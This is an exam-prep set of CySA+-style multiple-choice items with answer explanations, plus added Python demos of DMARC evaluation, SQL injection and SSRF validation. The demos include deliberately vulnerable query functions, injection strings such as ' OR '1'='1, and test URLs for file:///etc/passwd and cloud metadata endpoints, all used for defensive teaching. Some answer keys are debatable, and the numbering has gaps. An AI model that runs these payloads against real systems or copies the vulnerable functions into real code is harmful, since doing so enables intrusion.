WGU D483 CompTia SysA+ Study: Key Terms and Definitions (GUARANTEED SUCCESS)

111 Terms

1

An organization recently had an attack that resulted in system data loss. The system administrator must now restore the system with a data backup. What functional security control was the system administrator able to implement?

A.Preventative

B.Responsive

C.Corrective

D.Compensating

C.Corrective

The system administrator used a corrective control after the attack. A good example of a corrective control is a backup system that can restore data that an attacker damages during an intrusion.

Preventative controls act to eliminate or reduce the likelihood that an attack can succeed. A preventative control operates before an attack can take place.

Responsive controls serve to direct corrective actions enacted after the organization confirms the incident. They often document these actions in a playbook.

The compensating control is a substitute for a principal control, as recommended by a security standard, and affords the same (or better) level of protection but uses a different methodology or technology.

2

A security engineer installs a next-generation firewall on the perimeter of a network. This installation is an example of what type of security control class?

A.Managerial

B.Operational

C.Detective

D.Technical

D.Technical

Firewalls, antivirus software, and operating system (OS) access control models are examples of technical controls. A technical control is implemented as a system (hardware, software, or firmware).

Managerial controls give oversight of the information system; examples include risk identification and the processes used to evaluate and select other security controls.

Operational controls are implemented primarily by people rather than by systems; security guards and training programs are operational rather than technical controls.

Detective is a functional type of control (alongside preventive, corrective, and so on), not a security control class. The classes are technical, operational, and managerial.

3

An engineer is considering appropriate risk responses using threat modeling. They are trying to understand which threat actors are in scope for their organization. How does threat modeling identify the principal risks and tactics, techniques, and procedures (TTPs) for which their system may be susceptible? (Select the three best options.)

A.By evaluating the system from an attacker's point of view

B.By evaluating a system from a neutral perspective

C.Through using tools such as diagrams

D.By analyzing the system from the defender's perspective

A C D

Evaluating systems from a neutral perspective is not a method used in threat modeling.

4

A mission-critical system is offline at an organization due to a zero-day attack. The associated software vendor plans to release a patch to remediate the vulnerability. Which of the following are important patch management considerations for this scenario? (Select the three best options.)

A.A patch test environment

B.Immediate push delivery of critical security patches

C.A specific team responsible for reviewing vendor-supplied newsletters and security patch bulletins

D.A routine schedule for the rollout of noncritical patches

A B C

D. While creating a routine schedule for the rollout of noncritical patches has merit, it does not illustrate important patch management considerations in this example. A security analyst would address noncritical patches at a later time.

5

A security analyst is reviewing an announcement from the Cybersecurity and Infrastructure Security Agency. Which source of defensive open-source intelligence (OSINT) does the agency represent?

A.CERT

B.Internal sources

C.Government bulletins

D.CSIRT

C. Government bulletins

The government is responsible for protecting the country's constituents and the national infrastructure, and it publishes information and advice about observed threats. For example, the Department of Homeland Security and the Cybersecurity and Infrastructure Security Agency (CISA) publish several types of cybersecurity guidance, from basic informational content to binding operational directives that federal agencies must implement.

A computer emergency response team (CERT) aims to mitigate cybercrime and minimize damage by responding to incidents quickly.

Internal sources are the organization's own telemetry: evidence of active threats, reconnaissance activity, and suspicious behavior already exists within the protected environment, in logs, alerts, and sensor data.

A computer security incident response team (CSIRT) is a group responsible for responding to security incidents involving computer systems.

6

Hacktivist

such as Anonymous, WikiLeaks, or LulzSec, use cyber weapons to promote a political agenda. Hacktivists might attempt to obtain and release confidential information to the public domain, perform denial of service (DoS) attacks, or deface websites.

7

Nation-state

actors have participated in many attacks, particularly on energy and electoral systems. The goals of nation-state actors are primarily espionage and strategic advantage.

8

A computer emergency response team (CERT) is quickly reacting to an attack on the network infrastructure of a semiconductor manufacturer. What is true about a CERT? (Select the three best options.)

A.CERTS mitigate cybercrime.

B.CERTS work with local law enforcement.

C.CERTS provide knowledge of trending attacks.

D.CERTS publish a wide variety of information concerning threats.

A B C

D is incorrect. Publishing a wide variety of threat information is the role of government bulletins rather than of a CERT. For example, the Department of Homeland Security and the Cybersecurity and Infrastructure Security Agency (CISA) publish several types of cybersecurity guidance.

9

A systems administrator is searching for potential vulnerabilities in the network. Which threat-hunting focus area should the administrator examine, as attackers often exploit it through connected systems or physical access?

A.Isolated networks

B.Misconfigured systems

C.Business-critical assets

D.Lateral movements

A.Isolated networks

Isolated networks, such as air-gapped networks or networks with limited connectivity to the internet, are often assumed to be more secure. Attackers can still reach them by exploiting vulnerabilities in the systems that connect to them (management hosts, maintenance laptops, removable media) or through physical access.

10

CSIRT

A computer security incident response team (CSIRT) is a group responsible for responding to security incidents involving computer systems.

11

A system technician reviews system logs from various devices and notices discrepancies between recorded events. The events between the systems are not synchronizing in the correct order. Which configuration should the technician analyze and adjust to ensure proper and accurate logging? (Select the two best options.)

A.NTP

B.GPS

C.PKI

D.SSL

A.NTP

B.GPS

Time drift or time discrepancies can cause the system to create logs with incorrect time stamps. A time source can provide accuracy by using the Network Time Protocol (NTP) on the systems.

The Global Positioning System (GPS) is primarily a location technology, but GPS receivers also deliver a precise time signal and are commonly used as the reference clock for an NTP server.

Public key infrastructure (PKI) provides a suite of tools for public/private key management, integrity checks via digital signatures, and authentication. It does not provide time synchronization (although certificate validity checks depend on accurate time).

Secure Sockets Layer (SSL), now superseded by Transport Layer Security (TLS), is an encryption protocol. SSL/TLS inspection is useful for examining encrypted HTTPS traffic, but it does not address time synchronization.

12

A cloud architect advises an associate to consider a serverless platform for their new endeavor. What benefits would the architect highlight about a serverless platform? (Select the two best options.)

A.Serverless platforms require the management of physical or virtual server instances.

B.There are considerable management demands for file system security monitoring.

C.There is no requirement to provision multiple servers for redundancy or load balancing.

D.The service provider manages the underlying architecture.

C D

On a serverless platform the provider manages the underlying servers, operating systems, and scaling, so there is no need to provision multiple instances for redundancy or load balancing. Options A and B describe exactly what serverless removes. The customer still owns the security of the function code, its dependencies, its secrets, and the permissions (identity and access policies) granted to each function.

13

A support technician examines the Windows registry for a host on a local area network (LAN). The technician uses which subkey to find username information for accounts used on a computer?

A.SAM

B.SECURITY

C.DEFAULT

D.SYSTEM

A

The Windows registry is a database for storing operating system, device, and software application configuration information. The Security Accounts Manager (SAM) hive (HKEY_LOCAL_MACHINE\SAM) stores the local account database, including usernames and password hashes. Its contents are access-controlled so that only the SYSTEM account can read them: a technician running Registry Editor as an ordinary administrator sees the key but not its contents, and offline copies of the hive are a target for credential theft.

14

An engineer is studying the hardware architecture of a company's various systems. The engineer can find the x86 architecture in which of the following items? (Select the three best options.)

A.Desktops

B.ARM-based Tablets

C.Laptops

D.Servers

A C D

B is incorrect. Advanced RISC Machines (ARM) and x86 are the two common architectures. x86 dominates desktops, laptops, and servers, while ARM dominates smartphones, tablets, and single-board computers. An ARM-based tablet, by definition, does not use x86.

15

A group of security engineers looks to achieve high data enrichment while compiling threat information for review. Which solution will the engineers apply to achieve this goal?

A.Using different data sources

B.Using automation

C.Identifying threat areas

D.Improving accuracy

A. Using different data sources

16

An engineer enables a lightweight data sharing technology for trigger-based message sharing between security software applications. What automation feature does the engineer implement?

A.Add-ons

B.APIs

C.Webhooks

D.Plugins

C. Webhooks

The engineer will utilize webhooks in an automated messaging solution. They will implement webhooks to send automated messages from applications to other applications when certain events occur.

The engineer can extend the functionality of many security tools with add-ons. In this case, the engineer uses an out-of-the-box solution for the required need.

An application programming interface (API) is a set of functions and procedures that allow two or more applications to integrate. The engineer will use built-in functionality in this case.

Plugins are additions that help to tailor a software product to match requirements more closely. In this case, the engineer will use built-in functionality.

17

A new software development organization looks to provide a security solution for an existing security product. In doing so, developers at the organization utilize which technology from the existing product's toolkit to provide an integrated solution?

A.SOAR

B.SOC

C.SIEM

D.API

D. API

An application programming interface (API) is a set of functions and procedures that allow two or more applications to integrate. Developers can use the existing product's toolkit for integration.

Security orchestration, automation, and response (SOAR) is a process of using technology to automate identifying, analyzing, and responding to security threats. Using SOAR does not apply to developers.

Security operations centers (SOC) are integral to the success of an organization's information security program. Utilizing a SOC will not help the developers achieve their goals.

Security information and event management (SIEM) automates the collection, analysis, and response to security-related data. The use of a SIEM will not be of help to the developers.

18

A local city council tasked its Information Technology (IT) department to implement an international-scale cybersecurity framework. The requirement is coming from their cyber security insurance vendor. The vendor warned that this set of frameworks is not freely available. Which industry framework should the IT department investigate?

A.CIS

B.PCI DSS

C.OWASP

D.ISO

D. ISO

The International Organization for Standardization (ISO) manages and publishes a family of information security standards known as the ISO/IEC 27000 series (ISO 27k). The ISO/IEC 27001 standard document must be purchased; it is not free of charge.

The Center for Internet Security (CIS) benchmarks are a set of security configuration best practices. They provide a secure baseline configuration for various operating systems, applications, and hardware devices.

The Payment Card Industry Data Security Standard (PCI DSS) is a global data protection standard established and maintained by a consortium of payment card companies. PCI DSS identifies controls designed to prevent fraud and protect credit and debit card data.

The Open Web Application Security Project (OWASP) is a nonprofit foundation. OWASP is an international organization that provides unbiased, practical information about application security.

19

A boutique crafts company would like to set up a new eCommerce website. They are checking out vendors who have put a high level of detail in the security practices and implementation. They want to test a specific vendor's system to verify that it is not vulnerable to malicious actors injecting malformed data into the checkout process. Which kind of scan or test can the company run with permission?

A.Baseline scan

B.Map scan

C.Fuzzing

D.Internal scan

C. Fuzzing

Fuzzing is a black-box (unknown environment) testing method that uses specialized tools to feed an application large volumes of malformed, unexpected, or random input and watch for crashes, errors, or unhandled exceptions. Because it is an active test against the vendor's system, it must be run only with the vendor's explicit permission.

20

A video production company has a server farm with graphics cards that allows the company to generate computer-generated imagery. Although the servers do not currently store any data and are not expensive, the company wants to ensure the security of its equipment. What is a compelling reason why the company should be proactive in preventing server vulnerabilities?

A.Exploitability

B.Low asset value

C.High asset value

D.Save power consumption

A. Exploitability

Exploitability assesses the likelihood that an attacker can weaponize a vulnerability to achieve their objectives. Even a server that stores no data and has low asset value is worth attacking: a malicious actor can hijack idle GPU capacity to mine cryptocurrency or use the host as a foothold into the rest of the network.

21

After doing a forensics audit of malicious activity by a former employee, a company is looking to protect against potential liability. What process should the company follow to protect any evidence?

A.Data validation

B.Chain of custody

C.Legal hold

D.Data analysis

B. Chain of custody

The chain of custody records evidence handling from collection through presentation in court: who collected or handled each item, when, and for what purpose. The evidence can include hardware components, electronic data, or telephone systems; digital evidence is hashed at collection so that its integrity can be verified later.

22

A security analyst at a large organization is investigating a recent cyber attack. The analyst needs to determine the most comprehensive framework for analyzing the attack and understanding the different stages of the attack. Which of the following frameworks would be the most comprehensive for the security analyst to use in this scenario?

A.Cyber kill chain

B.Diamond model

C.National Institute of Standards and Technology (NIST)

D.SANS

A. Cyber kill chain

The cyber kill chain is a comprehensive framework for analyzing and understanding the different stages of a cyber attack.

The diamond model of intrusion analysis is a framework used to analyze and understand the different stages of a cyber attack. However, it is less comprehensive and detailed than the cyber kill chain.

The National Institute of Standards and Technology (NIST) Cybersecurity Framework is a set of cybersecurity standards and guidelines, but it does not provide a framework for analyzing the different stages of a cyber attack.

The SANS Institute Top 20 Critical Security Controls is a list of the 20 most important security controls; however, it does not provide a framework for analyzing the different stages of a cyber attack.


24

A financial organization is dealing with a sudden rise in security incidents. The security analyst has discovered a malware strain behind the incidents. To study its behavior and find a solution, the analyst decides to use a specific tool to isolate and analyze malware behavior. What tool is the analyst using?

A.ScoutSuite

B.Prowler

C.Cuckoo

D.Pacu

C.Cuckoo

The analyst uses Cuckoo, a malware analysis tool, to isolate and execute the malware in a controlled environment, which allows the analyst to study its behavior and determine the best way to mitigate the threat.

ScoutSuite is an open-source multi-cloud security-auditing tool, rather than a tool specifically designed to isolate and analyze malware behavior.

Prowler is a tool for performing Amazon Web Services (AWS) security assessments. It checks for security best practices, vulnerabilities, and network configurations.

Pacu is an Amazon Web Services (AWS) cloud environment exploitation framework. It provides a platform for security researchers to test and exploit vulnerabilities in AWS environments.

25

A network administrator at a small business is concerned about the increasing number of phishing attacks that are targeting the organization's employees. The administrator wants to implement a comprehensive solution to help protect the organization from these types of attacks. Which of the following solutions would be the most appropriate for the network administrator to use in this scenario?

A.Sender Policy Framework (SPF)

B.Domain-based Message Authentication, Reporting, and Conformance (DMARC)

C.DomainKeys Identified Mail (DKIM)

D.Transport Layer Security (TLS)

B.Domain-based Message Authentication, Reporting, and Conformance (DMARC)

DMARC is the most comprehensive of the four because it builds on SPF and DKIM: it checks that the domain those mechanisms authenticate aligns with the visible From address, tells receiving servers what to do with messages that fail (none, quarantine, or reject), and returns reports about who is sending mail as the domain. SPF and DKIM alone authenticate a sender but carry no policy, and TLS protects mail in transit but says nothing about who sent it.

26

A security analyst in a large organization observes a recent spike in security incidents. To enhance the endpoint security strategy, an endpoint detection and response (EDR) solution is implemented. Which of the following best describes the key feature of EDR and how it helps the security analyst detect and respond to malicious activity in the organization's network?

A.Automates security-related tasks

B.Provides real-time visibility into endpoint activity

C.Integrates with other security solutions

D.Performs forensic analysis on endpoints

B.Provides real-time visibility into endpoint activity

27

A security analyst has received a suspicious email that appears to be from a recognized address. The analyst needs to determine if the email is legitimate or not. Which of the following email analysis methods would be the most appropriate for the security analyst to use in this scenario?

A.Email Header Analysis

B.Link and Attachment Analysis

C.Sender Reputation Verification

D.Domain-based Message Authentication (DMARC)

D.Domain-based Message Authentication (DMARC)
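The two DMARC cards above say that DMARC adds alignment and a published policy on top of SPF and DKIM. The following added example (not part of the original study set) shows that logic in code: it parses a DMARC TXT record and evaluates one message's SPF/DKIM results against it. The records, domains and authentication results are constructed for illustration, and organizational-domain lookup is simplified to the last two labels where a real implementation would consult the Public Suffix List.

```python
"""Evaluate a DMARC policy against SPF and DKIM results for one message.

Added example for the DMARC cards above; it is not part of the original study
set. The DMARC records, domains and authentication results below are all
constructed for illustration. Organizational-domain lookup is simplified to the
last two labels (a real implementation consults the Public Suffix List).
"""
from __future__ import annotations


def parse_dmarc(txt: str) -> dict[str, str]:
    """Parse a DMARC TXT record such as 'v=DMARC1; p=reject; adkim=s' into tags."""
    tags: dict[str, str] = {}
    for part in txt.split(";"):
        part = part.strip()
        if not part:
            continue
        key, _, value = part.partition("=")
        tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1" or "p" not in tags:
        raise ValueError("not a valid DMARC record")
    # Alignment modes default to relaxed when the tags are absent.
    tags.setdefault("adkim", "r")
    tags.setdefault("aspf", "r")
    return tags


def org_domain(domain: str) -> str:
    """Simplified organizational domain: last two labels (example shortcut)."""
    return ".".join(domain.lower().split(".")[-2:])


def aligned(auth_domain: str, from_domain: str, mode: str) -> bool:
    """Strict alignment requires an exact match; relaxed accepts the same org domain."""
    if mode == "s":
        return auth_domain.lower() == from_domain.lower()
    return org_domain(auth_domain) == org_domain(from_domain)


def dmarc_disposition(
    record_txt: str,
    from_domain: str,
    spf_result: str,
    spf_domain: str | None,
    dkim_result: str,
    dkim_domain: str | None,
) -> str:
    """Return 'pass' or the published policy ('none', 'quarantine', 'reject').

    DMARC passes when at least one of SPF or DKIM both passes *and* is aligned
    with the RFC5322.From domain. An SPF pass for an attacker's own envelope
    domain therefore does not rescue a spoofed From header.
    """
    tags = parse_dmarc(record_txt)
    spf_ok = (
        spf_result == "pass"
        and spf_domain is not None
        and aligned(spf_domain, from_domain, tags["aspf"])
    )
    dkim_ok = (
        dkim_result == "pass"
        and dkim_domain is not None
        and aligned(dkim_domain, from_domain, tags["adkim"])
    )
    return "pass" if (spf_ok or dkim_ok) else tags["p"]


# Constructed records for the From domain example.com.
MONITOR_ONLY = "v=DMARC1; p=none; rua=mailto:dmarc@example.com"
ENFORCED = "v=DMARC1; p=reject; adkim=s; aspf=r; rua=mailto:dmarc@example.com"


def demo() -> dict[str, str]:
    """Three constructed messages, all with From: user@example.com."""
    # Phisher's own server: SPF passes for attacker.example, nothing signs as example.com.
    spoof = dict(from_domain="example.com", spf_result="pass",
                 spf_domain="attacker.example", dkim_result="none", dkim_domain=None)
    # Legitimate mail: SPF broke (forwarding) but the DKIM signature is example.com's.
    legit_dkim = dict(from_domain="example.com", spf_result="fail",
                      spf_domain="mail.example.com", dkim_result="pass",
                      dkim_domain="example.com")
    # Sent by a subdomain: strict DKIM alignment fails, relaxed SPF alignment passes.
    subdomain_sender = dict(from_domain="example.com", spf_result="pass",
                            spf_domain="mail.example.com", dkim_result="pass",
                            dkim_domain="mail.example.com")
    return {
        "spoof_monitor": dmarc_disposition(MONITOR_ONLY, **spoof),
        "spoof_enforced": dmarc_disposition(ENFORCED, **spoof),
        "legit_dkim": dmarc_disposition(ENFORCED, **legit_dkim),
        "subdomain_sender": dmarc_disposition(ENFORCED, **subdomain_sender),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:17s} -> {result}")
```

The spoofed message is the point of the card: SPF passes, yet DMARC fails because the passing domain is the attacker's, not the From domain. With p=none the receiver only reports, which is why a DMARC rollout that stops at monitoring does not reduce phishing; the same message is rejected once the policy is enforced.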

28

A security analyst at a large organization is investigating a recent cyber attack. The analyst needs to determine the most appropriate framework for analyzing the attacker's tactics, techniques, and procedures (TTPs). Which of the following frameworks would be the most appropriate for the security analyst to use?

A.Cyber kill chain

B.MITRE ATT&CK

C.SANS

D.National Institute of Standards and Technology (NIST)

B.MITRE ATT&CK

MITRE ATT&CK is a comprehensive framework for analyzing and understanding the tactics, techniques, and procedures (TTPs) used by attackers in cyber attacks.

While the cyber kill chain provides a detailed view of the different stages of an attack, it does not provide as much detail about the tactics, techniques, and procedures used by the attacker as MITRE ATT&CK.

The SANS Institute Top 20 Critical Security Controls list the 20 most important security controls organizations should implement to protect against cyber attacks. It does not specialize in tactics, techniques, and procedures (TTPs).

While the National Institute of Standards and Technology (NIST) provides a comprehensive view of information security, it does not provide a framework for analyzing tactics, techniques, and procedures (TTPs).

29

A company has hired a security analyst to perform a comprehensive information gathering and reconnaissance phase of a penetration testing engagement. The analyst needs to use a tool that can automate gathering information about a target and performing reconnaissance on the target network. Which of the following tools is best suited for this task?

A.Aircrack-ng

B.Recon-ng

C.Snort

D.Metasploit

B.Recon-ng

Recon-ng automates the reconnaissance and information-gathering process, making it an ideal choice for the given scenario.

The Aircrack-ng suite is primarily for assessing the security of wireless networks. While it is valuable for that purpose, it does not cover the comprehensive information gathering and reconnaissance needed in this scenario.

Snort is an open-source intrusion detection system (IDS) and intrusion prevention system (IPS). While it is a valuable network security tool, it does not specialize in information gathering and reconnaissance the way Recon-ng does.

Although Metasploit is used in the later stages of a penetration testing engagement (exploitation and post-exploitation), it is not designed for the initial information gathering and reconnaissance phase.

30

A security analyst is conducting an assessment of the network security of a small office. The analyst must determine if any unauthorized devices and services are on the network. What type of scan/sweep would indicate to the security analyst that unauthorized devices and services are running on the network?

A.Port scan

B.Ping sweep

C.TCP sweep

D.UDP sweep

A.Port scan

31

A security analyst examines suspicious activity on a Linux-based server within the organization's network. The analyst uncovers a file containing an obfuscated script that utilizes system-level commands. Which technique should the analyst use to efficiently investigate potential malicious activities related to this incident on the affected system?

A.Inspect the execution history of PowerShell scripts

B.Examine Python script execution history

C.Review JavaScript scripts output

D.Analyze shell script logs

D.Analyze shell script logs

Analyzing shell script logs is the most effective way to investigate this incident on a Linux-based system, since the obfuscated script uses system-level commands typical of shell scripts. In practice this means the shell history files of the affected accounts plus, more reliably, the audit trail (for example auditd records of execve calls), because a history file is writable by the user who owns it and is easily cleared or disabled by an attacker.

PowerShell is primarily found on Windows-based systems, while the affected server is Linux-based.

32

A security analyst discovers that a new scheduled task is executing an unknown script regularly. Upon further investigation, it shows that the script includes cmdlets that are specific to a certain scripting language. What is the most efficient way for the analyst to identify potentially malicious activity related to this incident on the affected system?

A.Review the output of JavaScript scripts

B.Examine Python script execution history

C.Analyze PowerShell logs

D.Investigate Ruby script dependencies

C.Analyze PowerShell logs

The script uses cmdlets, which are unique to PowerShell, so the analyst should examine the PowerShell logs. On Windows, Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) records the de-obfuscated script content as it executes, which is the most direct evidence of what the scheduled task actually ran.

33

A security analyst is conducting a penetration test using Nmap to assess the security posture of an organization's network. The analyst must automate this task on a Linux server to discover open ports on multiple hosts and collect more information about the discovered services before saving the results to a file. They would also like to avoid the need for installing additional software. Which scripting technique should the analyst use to accomplish this task efficiently?

A.Bash

B.JavaScript

C.Python

D.PowerShell

A.Bash

Bash is the default command-line shell and scripting language on most Linux systems, so it is available without installing additional software. Given the Linux-based nature of the network described, a Bash script wrapping Nmap is the most suitable technique: Nmap itself can read a host list, perform service version detection, and write its results to a file, and a Bash loop or cron entry automates the run.

34

A security analyst at an organization receives an alert from their security information and event management (SIEM) system. Upon reviewing the log data, the analyst notices an increase in high-privilege actions within the network. What should the analyst prioritize when investigating this issue to identify the potential underlying cause?

A.Investigate unusual network traffic patterns

B.Analyze new user accounts

C.Review application logs for unexpected behavior

D.Examine recent file changes and modifications

B.Analyze new user accounts

The analyst should prioritize analyzing newly created user accounts, as the increase in high-privilege actions may be in relation to the unauthorized introduction of new accounts with elevated permissions.

35

A software developer at a technology company needs a format to serialize and transmit data between a web application and a server. The format must be lightweight, easily parsed by web browsers, and efficient for frequent network requests. Which data interchange format should the developer use?

A.eXtensible Markup Language (XML)

B.Yet Another Markup Language (YAML)

C.Comma-Separated Values (CSV)

D.JavaScript Object Notation (JSON)

D.JavaScript Object Notation (JSON)

JavaScript Object Notation (JSON) is an ideal choice for web applications due to its lightweight nature, native parsing in JavaScript environments, and efficient client-server communication over networks. It is especially well suited to AJAX (Asynchronous JavaScript and XML) web applications, which require quick, asynchronous data exchanges between clients and servers.

36

B.Yet Another Markup Language (YAML)

YAML (now expanded as "YAML Ain't Markup Language") is known for its human readability and is most often used for configuration files rather than for browser-to-server data exchange.

37

Comma-Separated Values (CSV)

CSV is straightforward and useful for representing tabular data, but it lacks the ability to represent the more complex, hierarchical data structures that web applications often need.

38

An organization is recently experiencing a series of security incidents, and a security analyst is investigating these incidents. The analyst needs to efficiently identify indicators of potentially malicious activity within the affected applications. What should the analyst focus on to effectively analyze and identify malicious activity within the application environment?

A.Review application logs for unusual patterns or anomalies

B.Conduct a full network vulnerability scan

C.Perform a comprehensive penetration test

D.Implement strict network access control policies

A.Review application logs for unusual patterns or anomalies

39

A software development team at a financial institution is working on a new online banking platform. They want to follow secure coding best practices and implement parameterized queries to prevent structured query language (SQL) injection attacks. Which of the following scenarios best demonstrates the correct use of parameterized queries for the company?

A.Concatenating user input directly into the SQL query

B.Validating user input using client-side JavaScript

C.Replacing single quotes in user input with double quotes

D.Using an SQL query with placeholders and binding user input to the placeholders

D.Using an SQL query with placeholders and binding user input to the placeholders

Using an SQL query with placeholders and binding user input to them is the correct approach for implementing parameterized queries. Parameterized queries separate user input from the query, preventing SQL injection attacks.

Concatenating user input directly into the SQL query is insecure, as it can expose the application to SQL injection attacks, allowing the attacker to execute malicious input as part of the SQL query.

While input validation is essential, a malicious user can bypass client-side validation. Therefore, relying solely on client-side validation is insufficient to prevent SQL injection attacks.

Replacing single quotes in user input with double quotes is not a comprehensive solution for preventing SQL injection attacks. Instead, parameterized queries offer a more robust defense against such attacks.
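The card above contrasts concatenation, quote replacement and parameterized queries. The following added example (not part of the original study set) runs all three against an in-memory SQLite database so the difference is visible: the `*_vulnerable` functions are deliberately insecure, the accounts table and the payloads are constructed, and the numeric-context lookup shows why the quote-swapping defence of option C is not comprehensive.

```python
"""Parameterized queries versus string concatenation, demonstrated on SQLite.

Added example for the parameterized-query card above; not part of the original
study set. The accounts table and the payloads are constructed for illustration.
The *_vulnerable functions are deliberately insecure to show the failure.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create an in-memory database with two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE accounts (id INTEGER PRIMARY KEY, username TEXT, pin TEXT, balance INTEGER)"
    )
    conn.executemany(
        "INSERT INTO accounts (username, pin, balance) VALUES (?, ?, ?)",
        [("alice", "1234", 500), ("bob", "9876", 1200)],
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, pin: str) -> list[str]:
    """Option A: user input concatenated into the query (insecure)."""
    sql = (
        "SELECT username FROM accounts "
        f"WHERE username = '{username}' AND pin = '{pin}' ORDER BY id"
    )
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn: sqlite3.Connection, username: str, pin: str) -> list[str]:
    """Option D: placeholders; the driver sends input as data, never as SQL."""
    sql = "SELECT username FROM accounts WHERE username = ? AND pin = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (username, pin))]


def quote_swap(value: str) -> str:
    """Option C: the 'replace single quotes' defence."""
    return value.replace("'", '"')


def balance_vulnerable(conn: sqlite3.Connection, account_id: str) -> list[int]:
    """Numeric context: no quotes surround the value, so quote swapping is useless."""
    sql = f"SELECT balance FROM accounts WHERE id = {quote_swap(account_id)} ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def balance_parameterized(conn: sqlite3.Connection, account_id) -> list[int]:
    """The bound value is compared as one value; the text '1 OR 1=1' matches no id."""
    sql = "SELECT balance FROM accounts WHERE id = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (account_id,))]


if __name__ == "__main__":
    db = make_db()
    tautology = "' OR '1'='1"  # classic string-context payload
    print(login_vulnerable(db, "alice", tautology))      # every account
    print(login_parameterized(db, "alice", tautology))   # nothing
    print(balance_vulnerable(db, "1 OR 1=1"))            # both balances
    print(balance_parameterized(db, "1 OR 1=1"))         # nothing
```

With the concatenated query the PIN check collapses to `... AND pin = '' OR '1'='1'`, so every account is returned; the parameterized version compares the PIN against the literal string `' OR '1'='1` and returns nothing. Quote swapping does not even enter the picture for the numeric lookup, since `id = 1 OR 1=1` contains no quotes to replace.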

40

Cross-Site Request Forgery (CSRF)

web vulnerability that allows attackers to trick authenticated users into performing unintended actions on a web application without their knowledge.

It focuses on exploiting a user's existing authentication session rather than making requests on behalf of the web server.

41

Cross-Site Scripting (XSS)

type of web vulnerability that allows an attacker to inject malicious scripts into web pages viewed by other users.

42

Structured Query Language (SQL) injection

web vulnerability allowing attackers to inject malicious SQL queries into an application's database by exploiting input validation flaws.

43

A security researcher has discovered a vulnerability in a web application that allows an attacker to make requests to internal or external resources on behalf of the web server. Which of the following web vulnerabilities best describes this scenario?

A.Server-Side Request Forgery (SSRF)

B.Cross-Site Request Forgery (CSRF)

C.Cross-Site Scripting (XSS)

D.Structured Query Language (SQL) injection

A.Server-Side Request Forgery (SSRF)

Server-Side Request Forgery (SSRF) is a type of web vulnerability that allows an attacker to request internal or external resources on behalf of the web server.
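The defence for the SSRF scenario above is to validate any URL the server will fetch on a user's behalf before fetching it. The following added example (not part of the original study set) shows such a check: scheme and userinfo restrictions, an optional host allow-list, and a resolution step that rejects loopback, RFC 1918, link-local (including the 169.254.169.254 cloud metadata endpoint) and other non-public addresses. The `FAKE_DNS` table and the `51.51.51.51` address are constructed stand-ins so the code runs offline.

```python
"""Egress URL validation against SSRF, as an added example for the SSRF card.

Not part of the original study set. The resolver table is a constructed
stand-in for DNS so the example runs offline; in production the lookup is a
real resolution, and the check must be repeated on every redirect.
"""
from __future__ import annotations

import ipaddress
from urllib.parse import urlsplit

# Constructed DNS answers (example only). 51.51.51.51 is an arbitrary routable
# address; the RFC 5737 documentation ranges cannot be used here because
# ipaddress classifies them as non-public.
FAKE_DNS: dict[str, list[str]] = {
    "cdn.example.com": ["51.51.51.51"],
    "internal-wiki.example.com": ["10.0.0.5"],
    "metadata.example.com": ["169.254.169.254"],
}


def resolve(host: str) -> list[str]:
    """Return the addresses a host resolves to; IP literals resolve to themselves."""
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        return FAKE_DNS.get(host.lower(), [])


def is_public(ip: str) -> bool:
    """True only for routable public addresses: rejects loopback, RFC 1918,
    link-local (169.254.169.254 metadata endpoints), multicast, reserved, etc."""
    addr = ipaddress.ip_address(ip)
    return addr.is_global and not (
        addr.is_private
        or addr.is_loopback
        or addr.is_link_local
        or addr.is_multicast
        or addr.is_reserved
        or addr.is_unspecified
    )


def validate_outbound_url(url: str, allowed_hosts: set[str] | None = None) -> tuple[bool, str]:
    """Decide whether the server may fetch `url` on a user's behalf."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme not allowed: {parts.scheme or '(none)'}"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "userinfo in URL"  # e.g. http://trusted.example@evil.example/
    if allowed_hosts is not None and host.lower() not in allowed_hosts:
        return False, f"host not on allow-list: {host}"
    addresses = resolve(host)
    if not addresses:
        return False, f"unresolvable host: {host}"
    for ip in addresses:
        if not is_public(ip):
            return False, f"{host} resolves to non-public address {ip}"
    return True, "ok"


if __name__ == "__main__":
    for candidate in [
        "https://cdn.example.com/banner.png",
        "http://internal-wiki.example.com/",
        "http://metadata.example.com/latest/meta-data/",
        "http://169.254.169.254/latest/meta-data/",
        "http://127.0.0.1:8080/admin",
        "http://[::1]/",
        "file:///etc/passwd",
    ]:
        print(candidate, "->", validate_outbound_url(candidate))
```

Two caveats a practitioner would add: the address check is only as good as the moment of resolution (DNS rebinding and HTTP redirects can change the target after validation, so pin the resolved address for the actual connection and re-validate on each redirect), and a strict host allow-list is a far stronger control than address filtering where the set of legitimate targets is known.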

44

A security consultant identified a vulnerability in a web application that allows an attacker to execute arbitrary commands on the target system, potentially gaining full control over it. Which of the following web vulnerabilities best describes this scenario?

A.Directory traversal

B.Remote Code Execution (RCE)

C.Structured Query Language (SQL) injection

D.Server-Side Request Forgery (SSRF)

B.Remote Code Execution (RCE)

Remote Code Execution (RCE) is a type of web vulnerability that allows an attacker to execute arbitrary commands on the target system, potentially gaining full control over it.

45

Directory traversal

While directory traversal can lead to unauthorized file access, it does not involve executing arbitrary commands on the target system.

46

A web development company is working on an e-commerce website and wants to ensure that user-generated content, such as product reviews, does not introduce security vulnerabilities. Therefore, they follow secure coding best practices and implement output encoding to mitigate potential risks. What outcome can the company expect from correctly implementing output encoding?

A.Encoding special characters in user-generated content

B.Automatically validating user input before storing it in the database

C.Protecting the application against SQL injection attacks

D.Ensuring that user input is stored in a parameterized query

A.Encoding special characters in user-generated content

The correct approach is to prevent cross-site scripting (XSS) attacks by encoding special characters in user-generated content. Output encoding ensures that characters with meaning to the browser (such as <, >, &, and quotes) are rendered as text, so the browser never executes a script that a reviewer embedded in their content.

